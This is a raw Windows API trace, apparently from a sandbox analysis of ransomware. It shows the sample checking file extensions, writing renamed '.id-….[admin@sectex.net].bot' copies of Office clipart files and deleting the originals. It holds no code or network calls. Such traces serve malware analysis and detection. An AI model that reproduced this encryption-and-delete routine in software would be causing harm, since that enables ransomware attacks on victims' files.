	[0058.543] lstrlenW (lpString=".xls") returned 4
	[0058.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.543] lstrlenW (lpString=".xlsx") returned 5
	[0058.543] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.543] lstrlenW (lpString=".ppt") returned 4
	[0058.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.543] lstrlenW (lpString=".zip") returned 4
	[0058.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.543] lstrlenW (lpString=".rar") returned 4
	[0058.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString=".bz2") returned 4
	[0058.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString=".7z") returned 3
	[0058.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.543] lstrlenW (lpString=".dbf") returned 4
	[0058.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.543] lstrlenW (lpString=".1cd") returned 4
	[0058.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".jpg") returned 4
	[0058.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".doc") returned 4
	[0058.544] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString=".docx") returned 5
	[0058.544] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.544] lstrlenW (lpString=".pdf") returned 4
	[0058.544] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString=".xls") returned 4
	[0058.544] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.544] lstrlenW (lpString=".xlsx") returned 5
	[0058.544] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.544] lstrlenW (lpString=".ppt") returned 4
	[0058.544] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".zip") returned 4
	[0058.544] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.544] lstrlenW (lpString=".rar") returned 4
	[0058.544] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString=".bz2") returned 4
	[0058.544] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString=".7z") returned 3
	[0058.544] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".dbf") returned 4
	[0058.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".1cd") returned 4
	[0058.544] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.544] lstrlenW (lpString=".jpg") returned 4
	[0058.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.545] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.545] lstrlenW (lpString="AN01060_.WMF") returned 12
	[0058.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.847] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=7968) returned 1
	[0058.847] CloseHandle (hObject=0x188) returned 1
	[0058.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 0x20
	[0058.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.847] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.847] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0058.848] GetLastError () returned 0x0
	[0058.848] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1f20, lpOverlapped=0x0) returned 1
	[0058.850] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1f30, lpOverlapped=0x0) returned 1
	[0058.851] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.851] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.851] SetEndOfFile (hFile=0x158) returned 1
	[0058.851] CloseHandle (hObject=0x158) returned 1
	[0058.852] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.852] SetEndOfFile (hFile=0x188) returned 1
	[0058.852] CloseHandle (hObject=0x188) returned 1
	[0058.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.853] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1
	[0058.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.853] lstrlenW (lpString=".doc") returned 4
	[0058.853] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString=".docx") returned 5
	[0058.853] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.853] lstrlenW (lpString=".pdf") returned 4
	[0058.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString=".xls") returned 4
	[0058.853] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.853] lstrlenW (lpString=".xlsx") returned 5
	[0058.853] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.853] lstrlenW (lpString=".ppt") returned 4
	[0058.853] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.853] lstrlenW (lpString=".zip") returned 4
	[0058.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.853] lstrlenW (lpString=".rar") returned 4
	[0058.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString=".bz2") returned 4
	[0058.853] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString=".7z") returned 3
	[0058.853] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.853] lstrlenW (lpString=".dbf") returned 4
	[0058.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".1cd") returned 4
	[0058.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".jpg") returned 4
	[0058.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".doc") returned 4
	[0058.854] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString=".docx") returned 5
	[0058.854] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.854] lstrlenW (lpString=".pdf") returned 4
	[0058.854] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString=".xls") returned 4
	[0058.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.854] lstrlenW (lpString=".xlsx") returned 5
	[0058.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.854] lstrlenW (lpString=".ppt") returned 4
	[0058.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".zip") returned 4
	[0058.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.854] lstrlenW (lpString=".rar") returned 4
	[0058.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString=".bz2") returned 4
	[0058.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString=".7z") returned 3
	[0058.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".dbf") returned 4
	[0058.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".1cd") returned 4
	[0058.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63
	[0058.854] lstrlenW (lpString=".jpg") returned 4
	[0058.855] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.855] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.855] lstrlenW (lpString="AN01173_.WMF") returned 12
	[0058.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.856] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=26332) returned 1
	[0058.856] CloseHandle (hObject=0x188) returned 1
	[0058.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 0x20
	[0058.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.856] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.856] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0058.856] GetLastError () returned 0x0
	[0058.856] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x66dc, lpOverlapped=0x0) returned 1
	[0058.858] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x66e0, lpOverlapped=0x0) returned 1
	[0058.859] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.859] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.860] SetEndOfFile (hFile=0x158) returned 1
	[0058.860] CloseHandle (hObject=0x158) returned 1
	[0058.860] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.860] SetEndOfFile (hFile=0x188) returned 1
	[0058.861] CloseHandle (hObject=0x188) returned 1
	[0058.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1
	[0058.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.861] lstrlenW (lpString=".doc") returned 4
	[0058.861] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.861] lstrlenW (lpString=".docx") returned 5
	[0058.861] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.861] lstrlenW (lpString=".pdf") returned 4
	[0058.861] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.861] lstrlenW (lpString=".xls") returned 4
	[0058.861] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.861] lstrlenW (lpString=".xlsx") returned 5
	[0058.861] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.861] lstrlenW (lpString=".ppt") returned 4
	[0058.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString=".zip") returned 4
	[0058.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.862] lstrlenW (lpString=".rar") returned 4
	[0058.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString=".bz2") returned 4
	[0058.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString=".7z") returned 3
	[0058.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString=".dbf") returned 4
	[0058.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString=".1cd") returned 4
	[0058.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString=".jpg") returned 4
	[0058.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.862] lstrlenW (lpString=".doc") returned 4
	[0058.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString=".docx") returned 5
	[0058.862] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.862] lstrlenW (lpString=".pdf") returned 4
	[0058.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString=".xls") returned 4
	[0058.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.862] lstrlenW (lpString=".xlsx") returned 5
	[0058.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.862] lstrlenW (lpString=".ppt") returned 4
	[0058.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.863] lstrlenW (lpString=".zip") returned 4
	[0058.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.863] lstrlenW (lpString=".rar") returned 4
	[0058.863] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.863] lstrlenW (lpString=".bz2") returned 4
	[0058.863] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.863] lstrlenW (lpString=".7z") returned 3
	[0058.863] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.863] lstrlenW (lpString=".dbf") returned 4
	[0058.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.863] lstrlenW (lpString=".1cd") returned 4
	[0058.863] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63
	[0058.863] lstrlenW (lpString=".jpg") returned 4
	[0058.863] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.863] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.863] lstrlenW (lpString="AN01174_.WMF") returned 12
	[0058.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.863] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=27858) returned 1
	[0058.863] CloseHandle (hObject=0x188) returned 1
	[0058.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 0x20
	[0058.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.864] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.864] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0058.864] GetLastError () returned 0x0
	[0058.864] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x6cd2, lpOverlapped=0x0) returned 1
	[0058.866] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x6ce0, lpOverlapped=0x0) returned 1
	[0058.867] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.867] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.867] SetEndOfFile (hFile=0x158) returned 1
	[0058.867] CloseHandle (hObject=0x158) returned 1
	[0058.868] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.868] SetEndOfFile (hFile=0x188) returned 1
	[0058.868] CloseHandle (hObject=0x188) returned 1
	[0058.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.869] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1
	[0058.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.869] lstrlenW (lpString=".doc") returned 4
	[0058.869] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.869] lstrlenW (lpString=".docx") returned 5
	[0058.869] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.869] lstrlenW (lpString=".pdf") returned 4
	[0058.869] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.869] lstrlenW (lpString=".xls") returned 4
	[0058.869] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.869] lstrlenW (lpString=".xlsx") returned 5
	[0058.869] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.869] lstrlenW (lpString=".ppt") returned 4
	[0058.869] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
